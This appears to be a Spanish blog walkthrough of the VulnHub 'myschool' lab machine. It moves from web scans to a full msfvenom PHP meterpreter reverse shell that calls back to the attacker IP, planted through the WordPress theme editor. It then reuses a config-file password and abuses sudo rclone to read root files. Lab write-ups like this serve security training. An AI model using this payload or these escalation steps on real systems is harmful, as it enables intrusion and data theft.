Hola amigos, hacía mucho que no escribía, es por falta de tiempo, no os preocupéis.
En esta ocasión, os presento el ctf myschool, de vulnhub.
Máquina atacante: 192.168.1.57
Máquina víctima: 192.168.1.64
En el puerto 80:
Tenemos la versión:
Encontramos el exploit en exploitdb
Vemos el funcionamiento del exploit
root@kali:~/ctfs/myschool# python3 48779.py -h
usage: 48779.py [-h] --url URL -u USERNAME -p PASSWORD -lhost IP -lport PORT
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload - PHP Reverse Shell
optional arguments:
-h, --help show this help message and exit
--url URL URL to admin pane </admin/login.php>
-u USERNAME Username
-p PASSWORD Password
-lhost IP The listen address
-lport PORT The listen port
nikto -host http://192.168.1.64 -output nikto.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.64
+ Target Hostname: 192.168.1.64
+ Target Port: 80
+ Start Time: 2021-01-30 12:50:30 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Cookie CMSSESSIDde72be53c754 created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/login.php: Admin login page/section found.
+ 7921 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2021-01-30 12:51:37 (GMT1) (67 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)? y
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
- Sent updated info to cirt.net -- Thank you!
root@kali:~/ctfs/myschool#
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: dirb
START_TIME: Sat Jan 30 18:36:31 2021
URL_BASE: http://192.168.1.64/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.64/ ----
==> DIRECTORY: http://192.168.1.64/admin/
==> DIRECTORY: http://192.168.1.64/assets/
==> DIRECTORY: http://192.168.1.64/doc/
+ http://192.168.1.64/index.php (CODE:200|SIZE:18825)
==> DIRECTORY: http://192.168.1.64/lib/
==> DIRECTORY: http://192.168.1.64/modules/
+ http://192.168.1.64/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://192.168.1.64/tmp/
==> DIRECTORY: http://192.168.1.64/uploads/
---- Entering directory: http://192.168.1.64/admin/ ----
+ http://192.168.1.64/admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.64/admin/lang/
==> DIRECTORY: http://192.168.1.64/admin/plugins/
==> DIRECTORY: http://192.168.1.64/admin/templates/
==> DIRECTORY: http://192.168.1.64/admin/themes/
---- Entering directory: http://192.168.1.64/assets/ ----
==> DIRECTORY: http://192.168.1.64/assets/configs/
==> DIRECTORY: http://192.168.1.64/assets/css/
==> DIRECTORY: http://192.168.1.64/assets/images/
==> DIRECTORY: http://192.168.1.64/assets/plugins/
==> DIRECTORY: http://192.168.1.64/assets/templates/
---- Entering directory: http://192.168.1.64/doc/ ----
+ http://192.168.1.64/doc/admin.cgi (CODE:403|SIZE:277)
+ http://192.168.1.64/doc/admin.php (CODE:403|SIZE:277)
+ http://192.168.1.64/doc/admin.pl (CODE:403|SIZE:277)
+ http://192.168.1.64/doc/AT-admin.cgi (CODE:403|SIZE:277)
+ http://192.168.1.64/doc/cachemgr.cgi (CODE:403|SIZE:277)
+ http://192.168.1.64/doc/index.html (CODE:200|SIZE:24)
+ http://192.168.1.64/doc/index.php (CODE:403|SIZE:277)
+ http://192.168.1.64/doc/info.php (CODE:403|SIZE:277)
+ http://192.168.1.64/doc/phpinfo.php (CODE:403|SIZE:277)
+ http://192.168.1.64/doc/robots.txt (CODE:403|SIZE:277)
+ http://192.168.1.64/doc/xmlrpc.php (CODE:403|SIZE:277)
+ http://192.168.1.64/doc/xmlrpc_server.php (CODE:403|SIZE:277)
---- Entering directory: http://192.168.1.64/lib/ ----
==> DIRECTORY: http://192.168.1.64/lib/assets/
==> DIRECTORY: http://192.168.1.64/lib/classes/
+ http://192.168.1.64/lib/index.html (CODE:200|SIZE:24)
==> DIRECTORY: http://192.168.1.64/lib/jquery/
==> DIRECTORY: http://192.168.1.64/lib/lang/
==> DIRECTORY: http://192.168.1.64/lib/phpmailer/
==> DIRECTORY: http://192.168.1.64/lib/plugins/
==> DIRECTORY: http://192.168.1.64/lib/smarty/
==> DIRECTORY: http://192.168.1.64/lib/tasks/
---- Entering directory: http://192.168.1.64/modules/ ----
==> DIRECTORY: http://192.168.1.64/modules/News/
==> DIRECTORY: http://192.168.1.64/modules/Search/
---- Entering directory: http://192.168.1.64/tmp/ ----
==> DIRECTORY: http://192.168.1.64/tmp/cache/
==> DIRECTORY: http://192.168.1.64/tmp/templates_c/
---- Entering directory: http://192.168.1.64/uploads/ ----
==> DIRECTORY: http://192.168.1.64/uploads/images/
+ http://192.168.1.64/uploads/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.64/admin/lang/ ----
+ http://192.168.1.64/admin/lang/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/admin/plugins/ ----
+ http://192.168.1.64/admin/plugins/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/admin/templates/ ----
+ http://192.168.1.64/admin/templates/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/admin/themes/ ----
---- Entering directory: http://192.168.1.64/assets/configs/ ----
+ http://192.168.1.64/assets/configs/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.64/assets/css/ ----
+ http://192.168.1.64/assets/css/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.64/assets/images/ ----
+ http://192.168.1.64/assets/images/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.64/assets/plugins/ ----
+ http://192.168.1.64/assets/plugins/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.64/assets/templates/ ----
+ http://192.168.1.64/assets/templates/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.64/lib/assets/ ----
==> DIRECTORY: http://192.168.1.64/lib/assets/images/
==> DIRECTORY: http://192.168.1.64/lib/assets/templates/
---- Entering directory: http://192.168.1.64/lib/classes/ ----
+ http://192.168.1.64/lib/classes/index.html (CODE:200|SIZE:24)
==> DIRECTORY: http://192.168.1.64/lib/classes/internal/
---- Entering directory: http://192.168.1.64/lib/jquery/ ----
==> DIRECTORY: http://192.168.1.64/lib/jquery/css/
==> DIRECTORY: http://192.168.1.64/lib/jquery/js/
---- Entering directory: http://192.168.1.64/lib/lang/ ----
==> DIRECTORY: http://192.168.1.64/lib/lang/help/
==> DIRECTORY: http://192.168.1.64/lib/lang/tags/
==> DIRECTORY: http://192.168.1.64/lib/lang/tasks/
---- Entering directory: http://192.168.1.64/lib/phpmailer/ ----
+ http://192.168.1.64/lib/phpmailer/index.html (CODE:200|SIZE:24)
==> DIRECTORY: http://192.168.1.64/lib/phpmailer/language/
+ http://192.168.1.64/lib/phpmailer/LICENSE (CODE:200|SIZE:26421)
---- Entering directory: http://192.168.1.64/lib/plugins/ ----
+ http://192.168.1.64/lib/plugins/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/lib/smarty/ ----
+ http://192.168.1.64/lib/smarty/index.html (CODE:200|SIZE:24)
==> DIRECTORY: http://192.168.1.64/lib/smarty/plugins/
---- Entering directory: http://192.168.1.64/lib/tasks/ ----
+ http://192.168.1.64/lib/tasks/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/modules/News/ ----
==> DIRECTORY: http://192.168.1.64/modules/News/doc/
==> DIRECTORY: http://192.168.1.64/modules/News/images/
+ http://192.168.1.64/modules/News/index.html (CODE:200|SIZE:24)
==> DIRECTORY: http://192.168.1.64/modules/News/lang/
==> DIRECTORY: http://192.168.1.64/modules/News/lib/
==> DIRECTORY: http://192.168.1.64/modules/News/templates/
---- Entering directory: http://192.168.1.64/modules/Search/ ----
==> DIRECTORY: http://192.168.1.64/modules/Search/images/
+ http://192.168.1.64/modules/Search/index.html (CODE:200|SIZE:24)
==> DIRECTORY: http://192.168.1.64/modules/Search/lang/
==> DIRECTORY: http://192.168.1.64/modules/Search/templates/
---- Entering directory: http://192.168.1.64/tmp/cache/ ----
+ http://192.168.1.64/tmp/cache/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.64/tmp/templates_c/ ----
+ http://192.168.1.64/tmp/templates_c/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.64/uploads/images/ ----
+ http://192.168.1.64/uploads/images/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.64/lib/assets/images/ ----
+ http://192.168.1.64/lib/assets/images/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/lib/assets/templates/ ----
+ http://192.168.1.64/lib/assets/templates/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/lib/classes/internal/ ----
+ http://192.168.1.64/lib/classes/internal/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/lib/jquery/css/ ----
---- Entering directory: http://192.168.1.64/lib/jquery/js/ ----
+ http://192.168.1.64/lib/jquery/js/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/lib/lang/help/ ----
+ http://192.168.1.64/lib/lang/help/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/lib/lang/tags/ ----
+ http://192.168.1.64/lib/lang/tags/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/lib/lang/tasks/ ----
+ http://192.168.1.64/lib/lang/tasks/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/lib/phpmailer/language/ ----
+ http://192.168.1.64/lib/phpmailer/language/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/lib/smarty/plugins/ ----
+ http://192.168.1.64/lib/smarty/plugins/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/modules/News/doc/ ----
+ http://192.168.1.64/modules/News/doc/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/modules/News/images/ ----
+ http://192.168.1.64/modules/News/images/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/modules/News/lang/ ----
+ http://192.168.1.64/modules/News/lang/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/modules/News/lib/ ----
+ http://192.168.1.64/modules/News/lib/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/modules/News/templates/ ----
+ http://192.168.1.64/modules/News/templates/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/modules/Search/images/ ----
+ http://192.168.1.64/modules/Search/images/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/modules/Search/lang/ ----
+ http://192.168.1.64/modules/Search/lang/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.1.64/modules/Search/templates/ ----
+ http://192.168.1.64/modules/Search/templates/index.html (CODE:200|SIZE:24)
-----------------
END_TIME: Sat Jan 30 18:39:05 2021
DOWNLOADED: 221376 - FOUND: 53
root@kali:~/ctfs/myschool#
Por otro lado, tenemos en la página http://192.168.1.64/index.php?page=menu-manager-2 un nombre de usuario:
En el puerto 8080
Creamos una base de datos en mysql
root@kali:~/ctfs/myschool# service mysql start
root@kali:~/ctfs/myschool# mysql -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 14
Server version: 10.3.22-MariaDB-1 Debian buildd-unstable
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
creamos una base de datos
MariaDB [(none)]> create database wpress;
Query OK, 1 row affected (0.000 sec)
Creamos un usuario:
MariaDB [(none)]> create user 'wp-user'@'192.168.1.64' identified by 'contrasena1234';
Query OK, 0 rows affected (0.000 sec)
Le damos todos los permisos (grant option es para que él mismo pueda dar privilegios a otros usuarios)
MariaDB [(none)]> grant all on wpress.* to 'wp-user'@'192.168.1.64' with grant option;
Query OK, 0 rows affected (0.000 sec)
Cargamos todos los privilegios:
MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.001 sec)
Salimos:
MariaDB [(none)]> exit
Ahora, editamos
/etc/mysql/mariadb.conf.d/50-server.cnf
Y cambiamos bind-address 127.0.0.1 por bind-address 0.0.0.0 para que podamos conectarnos desde cualquier lado a nuestra base de datos.
Guardamos y salimos.
Reiniciamos mysql
service mysql restart
Y ponemos en la web:
Nombre de la base de datos: wpress
Nombre del usuario: wp-user
Contraseña: contrasena1234
Servidor de la base de datos: 192.168.1.57
El prefijo de la tabla lo dejamos igual.
En la siguiente ventana, ponemos, por ejemplo:
Crearemos un payload
root@kali:~/ctfs/myschool# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.57 LPORT=7777 -f raw > shell.php
hacemos:
root@kali:~/ctfs/myschool# cat shell.php
/*<?php /**/ error_reporting(0); $ip = '192.168.1.57'; $port = 7777; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();root@kali:~/ctfs/myschool#
este código es el que usaremos, pero de la siguiente manera:
<?php /**/ error_reporting(0); $ip = '192.168.1.57'; $port = 7777; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();?>
Por otro lado, iniciamos metasploit
msfconsole
Y nos ponemos a la escucha
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 exploit(multi/handler) > set LPORT 7777
LPORT => 7777
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 0.0.0.0:7777
msf5 exploit(multi/handler) >
Nos vamos a Apariencia → Editor de temas
Seleccionamos index.php y pegamos nuestro código
Damos a Actualizar archivo.
Y si en otra pestaña del navegador ponemos http:192.168.1.64:8080/index.php
Tendremos en nuestra consola:
[*] Meterpreter session 1 opened (192.168.1.57:7777 -> 192.168.1.64:53332) at 2021-02-20 18:56:55 +0100
[*] Sending stage (38288 bytes) to 192.168.1.64
[*] Meterpreter session 2 opened (192.168.1.57:7777 -> 192.168.1.64:53338) at 2021-02-20 18:58:17 +0100
msf5 exploit(multi/handler) >
Si nos vamos a /home, podremos ver que está el usuario armour, el cual tiene los siguientes ficheros:
meterpreter > ls
Listing: /home/armour
=====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100600/rw------- 0 fil 2020-11-02 11:16:17 +0100 .bash_history
100644/rw-r--r-- 220 fil 2020-10-27 16:47:42 +0100 .bash_logout
100644/rw-r--r-- 3526 fil 2020-10-27 16:47:42 +0100 .bashrc
40755/rwxr-xr-x 4096 dir 2020-11-02 10:35:33 +0100 .config
40700/rwx------ 4096 dir 2020-10-28 15:23:30 +0100 .gnupg
100644/rw-r--r-- 807 fil 2020-10-27 16:47:42 +0100 .profile
40700/rwx------ 4096 dir 2020-10-31 14:13:25 +0100 .ssh
100600/rw------- 736 fil 2020-11-02 11:00:03 +0100 .viminfo
100644/rw-r--r-- 33 fil 2020-11-02 11:00:02 +0100 user.txt
meterpreter > cat user.txt
628435356e49f976bab2c04948d22fe4
meterpreter >
Es más, podemos ver el contenido de user.txt
Con hash-identifier vemos el tipo de hash
root@kali:~/ctfs/myschool# hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 628435356e49f976bab2c04948d22fe4
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
vale, es MD5. Nos vamos a https://www.md5online.org/ y le decimos que nos desencripte el hash, y nos sale:
Abrimos una shell
meterpreter > shell
Process 989 created.
Channel 1 created.
Vamos a abrir bash
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@myschool:/home/armour$
Nos encontramos:
www-data@myschool:/var/www/html/cmsms$ cat config.php
cat config.php
<?php
# CMS Made Simple Configuration File
# Documentation: https://docs.cmsmadesimple.org/configuration/config-file/config-reference
#
$config['dbms'] = 'mysqli';
$config['db_hostname'] = 'localhost';
$config['db_username'] = 'root';
$config['db_password'] = 'SW)#$of4-9056d';
$config['db_name'] = 'cmsms_db';
$config['db_prefix'] = 'cms_';
$config['timezone'] = 'America/New_York';
?>www-data@myschool:/var/www/html/cmsms$
Pues hala:
su armour
Password: SW)#$of4-9056d
armour@myschool:/var/www/html/cmsms$
Con sudo -l podemos ver para qué aplicaciones tendríamos permisos de root
armour@myschool:/var/www/html/wordpress$ sudo -l
sudo -l
Matching Defaults entries for armour on myschool:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User armour may run the following commands on myschool:
(ALL : ALL) NOPASSWD: /usr/bin/rclone
armour@myschool:/var/www/html/wordpress$
tenemos permiso para rclone
armour@myschool:/var/www/html/wordpress$ rclone
rclone
Usage:
rclone [flags]
rclone [command]
Available Commands:
about Get quota information from the remote.
authorize Remote authorization.
cachestats Print cache stats for a remote
cat Concatenates any files and sends them to stdout.
check Checks the files in the source and destination match.
cleanup Clean up the remote if possible
config Enter an interactive configuration session.
copy Copy files from source to dest, skipping already copied
copyto Copy files from source to dest, skipping already copied
copyurl Copy url content to dest.
cryptcheck Cryptcheck checks the integrity of a crypted remote.
cryptdecode Cryptdecode returns unencrypted file names.
dbhashsum Produces a Dropbox hash file for all the objects in the path.
dedupe Interactively find duplicate files and delete/rename them.
delete Remove the contents of path.
deletefile Remove a single file from remote.
genautocomplete Output completion script for a given shell.
gendocs Output markdown docs for rclone to the directory supplied.
hashsum Produces an hashsum file for all the objects in the path.
help Show help for rclone commands, flags and backends.
link Generate public link to file/folder.
listremotes List all the remotes in the config file.
ls List the objects in the path with size and path.
lsd List all directories/containers/buckets in the path.
lsf List directories and objects in remote:path formatted for parsing
lsjson List directories and objects in the path in JSON format.
lsl List the objects in path with modification time, size and path.
md5sum Produces an md5sum file for all the objects in the path.
mkdir Make the path if it doesn't already exist.
mount Mount the remote as file system on a mountpoint.
move Move files from source to dest.
moveto Move file or directory from source to dest.
ncdu Explore a remote with a text based user interface.
obscure Obscure password for use in the rclone.conf
purge Remove the path and all of its contents.
rc Run a command against a running rclone.
rcat Copies standard input to file on remote.
rcd Run rclone listening to remote control commands only.
rmdir Remove the path if empty.
rmdirs Remove empty directories under the path.
serve Serve a remote over a protocol.
settier Changes storage class/tier of objects in remote.
sha1sum Produces an sha1sum file for all the objects in the path.
size Prints the total size and number of objects in remote:path.
sync Make source and dest identical, modifying destination only.
touch Create new file or change file modification time.
tree List the contents of the remote in a tree like fashion.
version Show the version number.
Use "rclone [command] --help" for more information about a command.
Use "rclone help flags" for to see the global flags.
Use "rclone help backends" for a list of supported services.
armour@myschool:/var/www/html/wordpress$
vemos que con rclone podemos hacer varias cosas
Veamos qué hay dentro del directorio /root/
armour@myschool:/var/www/html/wordpress$ sudo rclone ls /root/
sudo rclone ls /root/
5 .bash_history
570 .bashrc
100 .mysql_history
148 .profile
10459 .viminfo
168 .wget-hsts
46 proof.txt
96 .config/rclone/rclone.conf
armour@myschool:/var/www/html/wordpress$
Veamos que pone proof.txt
armour@myschool:/var/www/html/wordpress$ sudo rclone cat /root/proof.txt
sudo rclone cat /root/proof.txt
Best of Luck
02a4f62865fddf48345f51ffdbe073ec
armour@myschool:/var/www/html/wordpress$
Pues ya tenemos el flag.
